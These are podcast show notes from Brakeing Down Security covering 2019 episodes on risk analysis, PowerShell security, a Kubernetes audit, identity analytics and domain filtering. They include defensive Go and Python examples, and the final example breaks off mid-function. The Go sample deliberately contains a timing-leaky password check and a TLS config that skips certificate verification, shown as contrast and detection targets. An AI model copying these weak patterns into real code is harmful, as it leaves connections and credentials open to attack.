Regarding diversity scholarships, it's being worked on and the number of available spots will highly depend on the number of Sponsorships the conference secures.
As a side note WorkshopCon will sponsor a number of Layer8 conference tickets if people follow @WorkshopCon on Twitter and tweet to us why they are interested in Social Engineering and OSINT topics with hashtag #sendMeToLayer8. We will select folks from those tweets with the emphasis being on folks coming from underrepresented or minority groups.
In terms of sponsorship information for Layer8, Patrick wants people to send an email to [email protected]
Please let us know if you have any other questions, and thank you so much for giving us a hand spreading the word!!!
Saturday June 6, 2020, RI Convention Center
https://www.dianainitiative.org/
https://twitter.com/DianaInitiative
Conference in Las Vegas (Aug 6-7, 2020) (Thu & Fri)
Published on: December 4, 2019
Diana Initiative
@circuitswan @dianainitiative
https://www.dianainitiative.org/
https://twitter.com/DianaInitiative
Conference in Las Vegas (Aug 6-7, 2020) (Thu & Fri)
Topics
2019 ShellCon Tuneup Tips for Your CV and Profile, From an Interviewer
SE Village Con - Thu, Feb 20 - Sat, Feb 22 | Hilton Orlando Buena Vista Palace
Published on: November 27, 2019
Diana Initiative
@circuitswan
Published on: November 21, 2019
Tagnw.org
Amazon Smile - brakesec.com/smile
News:
https://www.androidpolice.com/2019/11/11/google-project-nightingale-health-records-collection/
https://blog.naijasecforce.com/the-jar-based-malware/ - from Ms. Infosecsherpa’s mailing list “nuzzle”
https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/
https://en.wikipedia.org/wiki/Data_Protection_API
https://www.routefifty.com/tech-data/2019/11/plan-engage-hackers-election-security/161045/
Published on: November 12, 2019
Grrcon update
2019-039 - BlueKeep weaponized… and more
BlueKeep weaponized
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708
https://www.microsoft.com/security/blog/2019/08/08/protect-against-bluekeep/
https://www.wired.com/story/bluekeep-hacking-cryptocurrency-mining
NordVPN hacked: https://arstechnica.com/information-technology/2019/11/nordvpn-users-passwords-exposed-in-mass-credential-stuffing-attacks/
Null sessions and how to avoid them:
https://www.dummies.com/programming/networking/null-session-attacks-and-how-to-avoid-them/
Linux has a marketing problem:
https://hackaday.com/2019/10/31/linuxs-marketing-problem/
20 accounts could pwn majority of NPM
Chrome 0day
https://thehackernews.com/2019/11/chrome-zero-day-update.html
India Nuclear plant is hacked
High Tea Security Podcast:
https://www.podcasts.com/high-tea-security-190182dc8
https://TAGNW.org - Bryan
Panel and talking about networking
Securewv.org - Training - https://www.eventbrite.com/e/security-dd-tickets-79219348203
Bsides Fredericton - https://www.eventbrite.ca/e/security-bsides-fredericton-2019-tickets-59449704667
Published on: November 4, 2019
OWASP WIA - https://www.youtube.com/watch?v=umnt0qbOPsE
https://www.owasp.org/index.php/Women_In_AppSec
OWASP Women in AppSec
Twitter: 2013_Nayak (reach and ask to be added)
Risk in Infosec
Risk - a situation which involves extreme danger and an extensive amount of unrecovered loss
What about risks that are positive in nature? PMP calls them ‘opportunities’
Risk Analysis - systematic examination of the components and characteristics of risk
Analysis Steps -
Understanding and Assessment
Understand there is a risk
What if a company does not have security standards?
Identification
Identify and categorize risk -
Informational risk
Network risk
Hardware risk
Software risk
Environment risk?
https://en.wikipedia.org/wiki/Routine_activity_theory
Scope of risk analysis?
Threat modeling to find risks?
https://www.leviathansecurity.com/blog/the-calculus-of-threat-modeling
SWOT (strength/weakness/opportunities/threats) analysis will discover risks?
Risk analysis methodologies?
https://www.project-risk-manager.com/blog/qualitative-risk-techniques/
https://securityscorecard.com/blog/it-security-risk-assessment-methodology
https://en.wikipedia.org/wiki/Probabilistic_risk_assessment
https://en.wikipedia.org/wiki/Capability_Maturity_Model_Integration
Estimation
Chance that risk will occur (once a decade, once a week)
Design controls to remediate
Implementation
Risk assessment is a combined approach
Combined approach for a risk analysis
You mentioned a lot of people, what’s the scope?
How do you do the risk assessment? Framework?
Evaluation
Evaluation approach
Like an agile approach
Provides an informed conclusion
Report must be clear (no jargon)
Decision Making
Examples to Reduce Risk
Training and education
What kind of testing? Annual security training?
Publishing policies
Agreement with organization
BAA with 3rd parties
Timely testing -
Published on: October 30, 2019
Derbycon9 talk - PowerShell Security Looking Back from the Inside - https://www.youtube.com/watch?v=DYWPtt7qszY&list=PLNhlcxQZJSm_ZDJBksg97I5q1XsdQcyN5&index=27&t=0s
Encarta - https://en.wikipedia.org/wiki/Encarta
Scott Hanselman’s twitter thread about Encarta: https://twitter.com/shanselman/status/1158780839464849409
Congrats on the black badge :)
I like that you bring up execution policies, and that they were never created to be a security control.
https://www.mssqltips.com/sqlservertip/2702/setting-the-powershell-execution-policy/
Want to learn Powershell? UnderTheWire wargame: https://underthewire.tech/
Jeffrey Snover “The Cultural battle to remove Windows from Windows Server”: https://www.youtube.com/watch?v=3Uvq38XOark
You talk about “why would anyone want to remove PowerShell?”, since it came as a standalone download and as part of the Windows SDK. I was taught, when I was just getting into tech, that I should fear PowerShell, and because of that I didn’t realize how powerful it could be as an admin.
Powershell slime trail <3 (powershell transparency)
“You can’t force a powerful tool only to be used how you want it to be used, you can tilt the playing field on behalf of defenders”
If an attacker is going to use powershell, let’s make them regret it
Powershell has had quite an impact and history.
My own sorry logging/alerting attempts
You mentioned the amount of attacks listed in MITRE that use powershell, is that *the* recommended resource for blue teamers, are there any others?
Revoke-Obfuscation white paper (blackhat2017): https://www.blackhat.com/docs/us-17/thursday/us-17-Bohannon-Revoke-Obfuscation-PowerShell-Obfuscation-Detection-And%20Evasion-Using-Science-wp.pdf
https://github.com/danielbohannon/Invoke-Obfuscation
https://github.com/danielbohannon/Revoke-Obfuscation
https://blog.trendmicro.com/trendlabs-security-intelligence/ransomware-now-uses-windows-powershell/
https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/TROJ_POSHCODER.A
Ever thought of writing a PowerShell security-centric book? Bill Pollock was looking for someone to write a book for No Starch…
Derbycon keynote with Lee Holmes and Jeffrey Snover - http://www.irongeek.com/i.php?page=videos/derbycon6/101-key-note-jeffrey-snover-lee-holmes
AMSI - Antimalware Scan Interface: https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal
https://www.amazon.com/dp/B00ARN9MEK/ref=dp-kindle-redirect?_encoding=UTF8&btkr=1 - Windows Powershell cookbook
Eric Conrad: https://www.ericconrad.com/2016/09/deepbluecli-powershell-module-for-hunt.html
https://github.com/sans-blue-team/DeepBlueCLI
Daniel Bohannon - DevSec Defense - https://www.youtube.com/watch?v=QJe8xikf-iE
https://github.com/psconfeu/2018/tree/master/Daniel%20Bohannon/DevSec%20Defense
Constrained language mode: https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/
Maslow’s security Hierarchy: https://www.leeholmes.com/blog/2014/12/08/maslows-hierarchy-of-security-controls/
Just Enough Administration: https://docs.microsoft.com/en-us/previous-versions//dn896648(v=technet.10)?redirectedfrom=MSDN
https://github.com/infosecn1nja/AD-Attack-Defense
Also - DrawOnMyBadge.com - Super cool idea, loved the mona lisa
@Lee_Holmes
@hackershealth
@log-md
@infosecCampout
@seasecEast
@brakesec
@bryanbrake
@boettcherpwned
@Infosystir
@packscott
@dpcybuck
@megan_roddie
@consultingCSO
Published on: October 22, 2019
Published on: October 17, 2019
Secure Python course:
https://brakesec.com/brakesecpythonclass
PDF Slides: https://drive.google.com/file/d/1wmxrfgbaHu56kfccLoOd5M3Zz6bNP6Qi/view?usp=sharing
GraphQL High Level
Designed to replace REST Arch
Allow you to make a large request, uses a query language
Released by FB in 2012
JSON
Learn Enough to be dangerous
https://blog.bitsrc.io/13-graphql-tools-and-libraries-you-should-know-in-2019-e4b9005f6fc2
WSDL: https://www.w3.org/TR/2001/NOTE-wsdl-20010315
Vulns in the Wild
Abusing GraphQL
OWASP Deserialization Cheat Sheet - https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html
Attack Techniques
https://www.apollographql.com/docs/apollo-server/data/data/
https://github.com/graphql/graphiql
Protecting GraphQL
https://github.com/maticzav/graphql-shield
Magento 2 (runs GraphQL), hard to update…
https://github.com/szski/shapeshifter - Matt’s tool on Shapeshifter
GraphQL implementations inside (ecosystem packages?)
Infosec Campout 2020 occurring (28-29 Aug 2020, Carnation, WA)
Patreon supporters (Josh P and David G)
Teepub: https://www.teepublic.com/user/bdspodcast
For Amanda next:
https://www.cybercareersummit.com/
& keynote @grrcon oct 24/25
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: October 9, 2019
Derbycon Discussion (bring Matt in)
Published on: October 2, 2019
Podcast Interview (Youtube): https://youtu.be/4tdJwBMh3ow
Tracy Maleeff (pronounced like may-leaf) - https://twitter.com/InfoSecSherpa
https://medium.com/@InfoSecSherpa
https://nuzzel.com/InfoSecSherpa
Python secure coding class - November 2nd / 5 Saturdays @nxvl Teaching
https://www.eventbrite.com/e/secure-python-coding-with-nicolas-valcarcel-registration-72804597511
Derbycon Talk: https://www.youtube.com/watch?v=KILlp4KMIPA
Plugs:
Nuzzel newsletter: https://nuzzel.com/infosecsherpa
OSINT-y Goodness blog: https://medium.com/@infosecsherpa
Tomato pie:
https://www.eater.com/2016/8/19/12525602/tomato-pie-philadelphia-new-jersey
Infosec is a service industry job (gasp!)
Customer service is an attitude, not department
Reference Interview:
https://en.wikipedia.org/wiki/Reference_interview
Approachability
Does your org make it easy to contact you?
What is your tone of writing?
What does your outgoing communication look like?
Rein in your attitude, language, etc…
“I am using an online translator” (great idea!)
What is your department’s reputation?
Create an assessment of your department…
“I didn’t know there was humans in security?” --
Interest
Be interested in solving the problem.
Make interaction a ‘safe space’
No judging, mocking
LOL, “EE Cummings”
https://poets.org/poem/amores-i
Listening
Pay attention to what the end user doesn’t say.
Don’t interrupt the end user
Interviewing
Repeat back what the user said or asked
Tone: Ask clarification questions, not accusatory questions
Searching
Did security fail the user?
Answering
Teachable moments
Building trust/relationship equity
“While you’re on the phone…”
“Thank you for your time”
Follow-Up
Think of ways to create a culture of security
Create canned emails
Random acts of kindness
cyberCupcakes!!!! Or potentially small value gift cards(?)
Kindness as currency
Christmas cookies
Spreading goodwill
building relationship equity
Reciprocity
Lunch and learns
People can’t be educated into vaccinations, but behavioral nudges help
“Telling people facts won’t change behavior”
Published on: September 22, 2019
Topics:
Infosec Campout report
Jay Beale (co-lead for audit) *Bust-a-Kube*
Aaron Small (product mgr at GKE/Google)
Atredis Partners
Trail of Bits
What was the Audit?
How did it come about?
Who were the players?
Kubernetes Working Group
Aaron, Craig, Jay, Joel
Outside vendors:
Atredis: Josh, Nathan Keltner
Trail of Bits: Stefan Edwards, Bobby Tonic, Dominik
Kubernetes Project Leads/Devs
Interviewed devs -- this was much of the info that went into the threat model
Rapid Risk Assessments - let’s put the GitHub repository in the show notes
What did it produce?
Vuln Report
Threat Model - https://github.com/kubernetes/community/blob/master/wg-security-audit/findings/Kubernetes%20Threat%20Model.pdf
White Papers
https://github.com/kubernetes/community/tree/master/wg-security-audit/findings
Discuss the results:
Threat model findings
Controls silently fail, leading to a false sense of security
Pod Security Policies, Egress Network Rules
Audit model isn’t strong enough for non-repudiation
By default, API server doesn’t log user movements through system
TLS Encryption weaknesses
Most components accept cleartext HTTP
Bootstrapping to add Kubelets is particularly weak
Multiple components do not check certificates and/or use self-signed certs
HTTPS isn’t enforced
Certificates are long-lived, with no revocation capability
Etcd doesn’t authenticate connections by default
Controllers all Bundled together
Confused Deputy: b/c lower priv controllers bundled in same binary as higher
Secrets not encrypted at rest by default
Etcd doesn’t have signatures on its write-ahead log
DoS attack: you can set anti-affinity on your pods to get nothing else scheduled on their nodes
Port 10255 has an unauthenticated HTTP server for status and health checking
Vulns / Findings (not complete list, but interesting)
Hostpath pod security policy bypass via persistent volumes
TOCTOU when moving PID to manager’s group
Improperly patched directory traversal in kubectl cp
Bearer tokens revealed in logs
Lots of MitM risk:
SSH not checking fingerprints: InsecureIgnoreHostKey
gRPC transport seems all set to WithInsecure()
HTTPS connections not checking certs
Some HTTPS connections are unauthenticated
Output encoding on JSON construction
This might lead to further work, as JSON can get written to logs that may be consumed elsewhere.
Non-constant time check on passwords
Lack of re-use / library-ification of code
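Two of the findings above, the non-constant-time password check and the HTTPS/gRPC clients that skip certificate verification, are implementation defects a defender can check for directly. The Go example below is added here for illustration and is not code from the Kubernetes audit, the Kubernetes project, or any of the show's guests. It puts the early-exit comparison the auditors flagged beside a constant-time one built on crypto/subtle, and adds a small helper that flags a client tls.Config which disables verification or permits old protocol versions. The function names, the sample credential and the weak/hardened configs are all constructed for this example.

```go
package main

import (
	"crypto/sha256"
	"crypto/subtle"
	"crypto/tls"
	"fmt"
)

// naiveEqual is the pattern the audit flagged: it returns as soon as a byte
// differs, so the time taken leaks how long a prefix of the guess was right.
// Kept only to contrast with constantTimeEqual; never use it for secrets.
func naiveEqual(stored, guess string) bool {
	if len(stored) != len(guess) {
		return false
	}
	for i := 0; i < len(stored); i++ {
		if stored[i] != guess[i] {
			return false
		}
	}
	return true
}

// constantTimeEqual hashes both values so the compared inputs always have the
// same length (hiding the stored secret's length), then compares the digests
// with subtle.ConstantTimeCompare, which takes the same time on match or mismatch.
func constantTimeEqual(stored, guess string) bool {
	a := sha256.Sum256([]byte(stored))
	b := sha256.Sum256([]byte(guess))
	return subtle.ConstantTimeCompare(a[:], b[:]) == 1
}

// auditTLSConfig returns findings for a client tls.Config, in the spirit of the
// "HTTPS connections not checking certs" items above. A nil config means Go's
// defaults, which verify the server certificate, so it yields no findings.
// A zero MinVersion is left to the Go release's default and is not flagged.
func auditTLSConfig(cfg *tls.Config) []string {
	var findings []string
	if cfg == nil {
		return findings
	}
	if cfg.InsecureSkipVerify {
		findings = append(findings, "InsecureSkipVerify is set: server certificate is not verified (MitM risk)")
	}
	if cfg.MinVersion != 0 && cfg.MinVersion < tls.VersionTLS12 {
		findings = append(findings, "MinVersion permits TLS below 1.2")
	}
	return findings
}

// hardenedClientConfig is the corrected counterpart: verification stays on
// and TLS 1.2 is the floor. Certificate pinning or a private CA pool would
// be layered on top of this in a real deployment.
func hardenedClientConfig() *tls.Config {
	return &tls.Config{MinVersion: tls.VersionTLS12}
}

func main() {
	// Constructed sample credential for the demo, not a real secret.
	const stored = "correct-horse-battery-staple"
	fmt.Println("naive match:", naiveEqual(stored, stored))
	fmt.Println("constant-time match:", constantTimeEqual(stored, stored))
	fmt.Println("constant-time mismatch:", constantTimeEqual(stored, "wrong"))

	// Weak client config modelled on the MitM findings, beside the hardened one.
	weak := &tls.Config{InsecureSkipVerify: true, MinVersion: tls.VersionTLS10}
	for _, f := range auditTLSConfig(weak) {
		fmt.Println("finding:", f)
	}
	fmt.Println("hardened findings:", len(auditTLSConfig(hardenedClientConfig())))
}
```

The same shape of check applies to the other transport findings in the list: a code-review grep for `InsecureSkipVerify: true`, `grpc.WithInsecure()` or `ssh.InsecureIgnoreHostKey()` in a Go codebase turns up the spots where a connection is not authenticating its peer.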
Who will use these findings and how? Devs, google, bad guys?
Any new audit tools created from this?
Brad Geesaman, “Hacking and Hardening Kubernetes Clusters by Example [I]” - Brad Geesaman, Symantec: https://www.youtube.com/watch?v=vTgQLzeBfRU
Aaron Small:
https://cloud.google.com/kubernetes-engine/docs/how-to/hardening-your-cluster
CNCF: https://www.youtube.com/watch?v=90kZRyPcRZw
Findings:
Scope for testing:
Source code review (what languages did they have to review?)
Golang, shell, ...
Networking (discuss the networking *internal* *external*)
Cryptography (TLS, data stores)
AuthN/AuthZ
RBAC (which roles were tested? Just admin/non-admin *best practice is no admin/least priv*)
Secrets
Namespace traversals
Namespace claims
Methodology:
Set up a bunch of environments?
Primarily set up a single environment IIRC
Combination of code audit and active ?fuzzing?
What does one fuzz on a K8s environment?
Tested with latest alpha or production versions?
Version 1.13 or 1.14 - version locked at whatever was current - K8S releases a new version every 3 months, so this is a challenge and means we have to keep auditing.
Tested multiple different types of k8s implementations?
Tested primarily against kubespray (https://github.com/kubernetes-sigs/kubespray)
Bug Bounty program:
https://github.com/kubernetes/community/blob/master/contributors/guide/bug-bounty.md
Published on: September 16, 2019
This evening, we all came together to spend a bit of time talking about the final Derbycon. We talk to Mic Douglas about his 9 Derbycon appearances, and Gary Rimar (piano player extraordinaire) talks about @litmoose's talk on how to tell C-levels that their applications aren't good.
We also got asked about how the show came about, and how we found each other.
**Apologies for the echo in some parts... I did what I could to clean it up, but we were too close and the mics got a bit overzealous...**
Published on: September 7, 2019
Topics:
Infosec Campout report
Derbycon Pizza Party (with podcast show!) https://www.eventbrite.com/e/brakesec-pizza-party-at-the-derbycon-mental-health-village-tickets-69219271705
Mental health village at Derbycon
Published on: August 31, 2019
Intro - Ms. DirInfosec “Anna”
Call centers are torn between wanting to give good customer service and needing to move the call along.
Metrics are tailored to support an environment conducive to these kinds of attacks
https://en.wikipedia.org/wiki/Social_engineering_(security)
Social engineering will prey on people’s altruism
“Pregnant woman needing help through the security door”
“Person on crutches”
“Delivery person with arms full”
“Can’t remember information, others filling in missing bits”
Call Center Reps are _paid_ to be helpful. “Customer is never wrong”
Creating a sense of urgency to spur action
Real-life scenario: "bob calls asking about status of an order"
Questions:
Pre-training audio (#1 and #2)
https://www.pindrop.com/blog/tackling-113-fraud-increase-call-centers-webinar-recap/
https://www.bai.org/banking-strategies/article-detail/beating-crooks-at-call-center-fraud
@consultingCSO on twitter
Published on: August 16, 2019
https://www.infosecurity-magazine.com/news/95-test-problems/
https://www.infosecurity-magazine.com/news/93-of-organizations-cite-phishing/
https://tresorit.com/blog/the-top-6-takeaways-from-the-2019-cost-of-a-data-breach-report/
Good links:
https://github.com/RedTeamOperations/PivotSuite
https://www.reddit.com/r/security/comments/cks2jd/12gb_of_powershell_malware/
Published on: August 9, 2019
Published on: August 1, 2019
Fileless malware campaign - https://www.microsoft.com/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/
https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/fileless-threats
https://www.andreafortuna.org/2017/12/08/what-is-reflective-dll-injection-and-how-can-be-detected/
https://www.extremetech.com/computing/294852-new-zip-bomb-stuffs-4-5pb-of-data-into-46mb-file
https://articles.forensicfocus.com/2019/07/15/finding-and-interpreting-windows-firewall-rules/
https://www.theregister.co.uk/2019/02/11/google_gmail_developer/
Privacy issues:
Companies integrating with email systems
Pulling all information from the inboxes
Collecting that information
Storing for long periods of time (‘training the AI’)
Check for SOC2 and press them on their data storage and privacy policies
Have language in your 3rd party agreements to understand sharing and collection
Cool Tools:
https://github.com/AxtMueller/Windows-Kernel-Explorer
https://github.com/TheSecondSun/Revssl
Published on: July 24, 2019
MITRE Pre-Attack techniques https://attack.mitre.org/techniques/pre/
https://www.bbc.com/news/business-48905907
Zoom - https://www.wired.com/story/zoom-flaw-web-server-fix/
Published on: July 14, 2019
Starting a new business (hanging the shingle)
What’s a way to become an independent consultant?
Especially if you don’t have a reputation?
Ben's reading list:
“Mindset: the New Psychology of success”
“Essentialism”
“Extreme ownership”
“Team of teams”
Published on: July 9, 2019
Identity analytics
“Identity analytics is the next evolution of the IGA (Identity Governance & Administration) market. Identity professionals can use this emerging set of solutions combining big data and advanced analytics to increase identity-related risk awareness and enhance IAM processes such as access certification, access request and role management.” -- Gartner
Identity related risk awareness
Access certification is the process of validating access rights within systems. ... With access certification, organizations and regulations aim to formally validate users within systems and ensure their access rights are appropriate.
Access request - a system must validate that a user has need-to-know
Role management - users must be validated in a particular role or roles (admin, superuser, backup controller, launch manager, code committer)
What kind of threats are you protecting against?
What do you solve that proper administration of users can do?
How does technology like this improve IAM processes?
If it gathers heuristics, what happens when a user changes? (loses an arm, finger, or sneezes during password login, or just ages?)
Where is the best fit for these kinds of systems?
Where should you put these systems if you’re in a blended environment? And how does this work with systems like Active Directory?
Privacy issues… what if any do you have to deal with in this case?
That was my next question
Entitlements? What’s the difference between entitlements and AuthN?
Identity creep -Ben gave a talk on it https://www.brighttalk.com/webcast/17685/362274
Does this monitor, or will it also prevent?
If it doesn’t, can it send alerts to your IPS to isolate?
“Blast radius”
https://whatis.techtarget.com/definition/behavioral-biometrics
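To make the “identity creep”, access certification and “blast radius” questions above concrete, here is an added example (not from the episode or any IGA product) of the three checks an identity-analytics tool runs over an entitlement inventory and an access log. The users, roles, entitlements and log lines are constructed, and the access log is assumed to be a flat “timestamp user entitlement” export.

```python
"""Identity-analytics checks over constructed entitlement and access data.

Added example for the questions above; it is not from the episode or any IGA
product. Users, roles, entitlements and log lines are all made up, and the
access log is assumed to be a flat "timestamp user entitlement" export.
"""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed entitlement inventory: user -> (role, entitlements held)
ENTITLEMENTS = {
    "alice": ("developer", {"git:push", "ci:run", "prod:db:read"}),
    "bob":   ("developer", {"git:push", "ci:run"}),
    "carol": ("developer", {"git:push", "ci:run", "prod:db:admin", "hr:payroll:read"}),
    "dave":  ("backup-operator", {"backup:restore", "prod:db:read"}),
}

# Constructed access log: which entitlement a user actually exercised, and when
ACCESS_LOG = """\
2019-06-01T09:00:00 alice git:push
2019-06-02T10:15:00 alice ci:run
2019-06-03T11:00:00 bob git:push
2019-06-20T08:30:00 carol git:push
2019-03-01T12:00:00 carol prod:db:admin
2019-06-25T13:00:00 dave backup:restore
"""


def parse_access_log(text):
    """Return {(user, entitlement): datetime of most recent use}."""
    last_used = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, ent = line.split()
        when = datetime.fromisoformat(ts)
        if (user, ent) not in last_used or when > last_used[(user, ent)]:
            last_used[(user, ent)] = when
    return last_used


def stale_entitlements(entitlements, last_used, now_iso, max_idle_days=90):
    """Identity creep: entitlements held but not exercised in max_idle_days.
    Entitlements that were never used are reported too; these are the first
    candidates to revoke in an access certification campaign."""
    cutoff = datetime.fromisoformat(now_iso) - timedelta(days=max_idle_days)
    stale = defaultdict(set)
    for user, (_role, ents) in entitlements.items():
        for ent in ents:
            when = last_used.get((user, ent))
            if when is None or when < cutoff:
                stale[user].add(ent)
    return dict(stale)


def peer_group_outliers(entitlements, min_peer_fraction=0.5):
    """Entitlements a user holds that fewer than min_peer_fraction of the
    user's role peers also hold. This is the analytics part: it catches a
    developer with payroll access without anyone writing that rule by hand.
    A role with a single member has no peers and is skipped."""
    by_role = defaultdict(list)
    for user, (role, ents) in entitlements.items():
        by_role[role].append((user, ents))
    outliers = {}
    for members in by_role.values():
        if len(members) < 2:
            continue
        counts = Counter(ent for _user, ents in members for ent in ents)
        peers = len(members) - 1
        for user, ents in members:
            # counts[e] - 1 removes the user's own holding of e
            rare = {e for e in ents if (counts[e] - 1) / peers < min_peer_fraction}
            if rare:
                outliers[user] = rare
    return outliers


def blast_radius(entitlements, user):
    """Number of entitlements an attacker inherits by compromising one identity;
    a crude score for deciding which accounts to certify (and alert on) first."""
    return len(entitlements[user][1])
```

Run it as a certification pre-pass: the stale list is what you ask managers to confirm or revoke, the peer-group outliers are what you escalate rather than rubber-stamp, and the blast radius orders the queue. The caveat from the discussion stands: this only monitors; it still needs a human or a provisioning hook to actually remove access.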
Announcements:
InfoSec Campout Conference (Eventbrite, social contract, etc): https://www.infoseccampout.com
All Day Devops (https://www.alldaydevops.com) free talks online... Next conference starts 06 November 2019
------
Tanya Janca (@shehackspurple)
@wosectweets - Women of Security
DevOps Tools for free/cheap.
They are all on github right, so they are all free?
Python, Docker, k8s, Jenkins
Licensing can be a problem
Free-mium software, or trialware is useful?
OWASP DevSlop
Module
Nicole Becker
Pixie - insecure instagram
“Betty Coin”
SSLlabs - Qualys
Mentoring Monday:
What is “Mentoring Monday”?
What does it take to be a good mentor?
Should a mentee have a goal in mind?
Something other than “I want to be just like you”?
Do you assist in creating the relationship?
What if they don’t meld?
Are there any restrictions?
Any place in someone’s career?
How do you apply?
Advocating and being a good ally
Leading Cyber Ladies: https://twitter.com/LadiesCyber
WoSec International - https://twitter.com/WoSECtweets
19 Chapters worldwide
Africa, No. America, Europe
Goal? (hacker workshops)
Submitting talks at cons
Outreaching (how would people get involved)
Mentorship involved in this?
Global AppSec
Videos on youtube:
OWASP DevSlop: https://www.youtube.com/channel/UCSmjcWvgVBqF3x_7e5rfe3A
Blog Site: https://dev.to/shehackspurple
ANNOUNCEMENTS: INFOSEC CAMPOUT TICKETS ARE STILL ON SALE. Go to https://www.infoseccampout.com for Eventbrite link and more information.
Part 2 of our Discussion with Chris Sanders (@chrissanders88)
Topics discussed:
Companies dropping existing frameworks for ATT&CK Matrix, why?
Rural Technology Fund - What it is, how does it work, Who can help make it more awesome.
https://chrissanders.org/2019/05/infosec-mental-models/
I’ve argued for some time that information security is in a growing state of cognitive crisis…
Demand outweighs supply
Because so many organizations need experience, they are unable to appropriately invest in entry-level jobs and devote the necessary time for internal training.
That’s an HR and hiring manager issue, right? --brbr No. --bboettcher
Information cannot be validated or trusted
There are few authoritative sources of knowledge about critical components and procedures.
Large systemic issues persist with no ability to tackle them in a large, mobilized, or strategic manner.
The industry is unable to organize or widely combat the biggest issues they face.
Groups of individuals, everyone thinking they have the ‘right answer’, just like linux flavors --brbr
https://www.fireeye.com/blog/threat-research/2015/06/caching_out_the_val.html
https://www.helpnetsecurity.com/2018/07/10/windows-shimcache-threat-hunting/
Dependence on tools: http://traffic.libsyn.com/brakeingsecurity/2016-006-Moxie_vs_Mechanism-dependence_on_tools.mp3
https://en.wikipedia.org/wiki/Cognitive_revolution
https://buzzmachine.com/2019/04/25/a-crisis-of-cognition/
How do we solve it?
https://www.maximumfun.org/shows/sawbones - sawbones podcast (amanda mentioned)
Mental Model?
We use them all the time? Gotta simplify the complex...
Distribution and the Bell Curve
Operant Conditioning
https://www.latimes.com/science/la-sci-emotional-stereotypes-about-women-20190530-story.html
The Scientific Method
Applied Models
13 Organ Systems
4 Vital Signs
10 Point Pain scale
Defense in Depth
OSI model
Investigation Process
https://en.wikipedia.org/wiki/Inductive_reasoning
Model Desperation
Companies dumping existing models and embracing something else
The problem is that we’re model hungry and we’ll rapidly use and abuse any reasonable model that presents itself. Ultimately, we want good models because we want a robust toolbox. But, not everything is a job for a hammer and we don’t need fourteen circular saws.
What makes a good model?
Simple
Useful
Imperfect? (wuh?)-brbr
Creating models
Begins by asking a question… (what is the weather going to look like tomorrow? --brbr)
What defines the sandwich? (kind of like “https://en.wikipedia.org/wiki/Theory_of_forms” --brbr)
Discuss the Rural Tech Fund https://twitter.com/RuralTechFund
https://ruraltechfund.org/
Practical Threat Hunting - https://twitter.com/chrissanders88/status/1133388347194454018
Practical Packet Analysis - https://nostarch.com/packetanalysis3
Suggesting books:
https://www.amazon.com/Thinking-Fast-Slow-Daniel-Kahneman/dp/0374533555
https://www.amazon.com/Undoing-Project-Friendship-Changed-Minds/dp/0393354776
More references on Chris’ site https://chrissanders.org/2019/05/infosec-mental-models/
Book Club
Cult of the dead cow - June
Tribe of Hackers - July
The Mastermind - August
The Cuckoo’s Egg - September
Bryan got phished (almost) - story time!
https://isc.sans.edu/forums/diary/Do+you+block+new+domain+names/17564/
Through OpenDNS
https://learn-umbrella.cisco.com/product-videos/newly-seen-domains-in-cisco-umbrella
Available January 2017, Umbrella filters newly seen or created domains. By using new domains to host malware and other threats, attackers can outsmart security systems that rely on reputation scores or possibly outdated block lists. Umbrella now stops these domains before they even load.
Also “unknown” category? pros/cons
Good filter time for domains?
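The “newly seen domain” check is simple enough to reproduce on your own resolver logs, and doing so shows the pros and cons asked about above. This is an added example, not OpenDNS or Cisco code; the log lines and the tiny public-suffix stand-in are constructed, and the thresholds (24 hours “new”, 7 days of warm-up) are assumptions to tune.

```python
"""Flag lookups of 'newly seen' registrable domains from a resolver log, the
check the Umbrella category above performs with a global view. Added example,
not OpenDNS/Cisco code. The log lines and the tiny public-suffix stand-in are
constructed for the example."""
from datetime import datetime, timedelta

# Constructed stand-in for the public suffix list; a real deployment loads the
# full list from publicsuffix.org so "co.uk"-style suffixes are handled.
PUBLIC_SUFFIXES = {"com", "net", "org", "io", "co.uk"}

# Constructed resolver log: "timestamp client qname"
DNS_LOG = """\
2019-06-01T08:00:00 10.0.0.5 www.example.com
2019-06-01T08:00:05 10.0.0.5 mail.example.com
2019-06-03T12:00:00 10.0.0.6 api.widgets.io
2019-06-12T14:02:10 10.0.0.9 login.examp1e-bank.co.uk
2019-06-12T14:02:11 10.0.0.9 cdn.login.examp1e-bank.co.uk
2019-06-14T09:30:00 10.0.0.7 docs.example.com
2019-06-14T09:31:00 10.0.0.7 login.examp1e-bank.co.uk
"""


def registrable_domain(fqdn):
    """Reduce a hostname to its registrable domain (eTLD+1), so that an
    attacker rotating hostnames under one fresh domain is still one domain:
    'cdn.login.examp1e-bank.co.uk' -> 'examp1e-bank.co.uk'."""
    labels = fqdn.lower().rstrip(".").split(".")
    for n in (2, 1):  # longest known suffix first
        if len(labels) > n and ".".join(labels[-n:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[-(n + 1):])
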